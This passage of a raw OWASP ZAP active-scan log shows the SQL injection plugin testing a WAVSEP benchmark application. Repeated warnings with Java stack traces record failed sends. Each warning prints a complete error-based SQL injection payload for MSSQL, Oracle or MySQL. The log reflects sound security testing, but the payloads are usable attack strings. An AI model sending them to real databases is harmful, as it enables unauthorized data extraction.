org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679867 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1031=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1031=1031) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'dgzd'='dgzd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1031=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1031=1031) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'dgzd'='dgzd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679868 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7553=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7553=7553) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7553=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7553=7553) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679869 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4905=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4905=4905) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- EmsJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4905=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4905=4905) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- EmsJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679870 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4847=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4847=4847) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (3507=3507] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4847=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4847=4847) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (3507=3507 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679871 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7257=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7257=7257) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7257=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7257=7257) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679872 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 1891=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1891=1891) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('BDtC'='BDtC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 1891=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1891=1891) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('BDtC'='BDtC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679873 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8485=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8485=8485) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'LDWo'='LDWo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8485=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8485=8485) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'LDWo'='LDWo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679874 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 6310=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6310=6310) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 6310=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6310=6310) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679875 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4726=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4726=4726) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- dhgU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4726=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4726=4726) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- dhgU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679876 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 7080 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7080=7080,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT 7080 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7080=7080,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679877 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9989=9989,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9989=9989,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679877 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 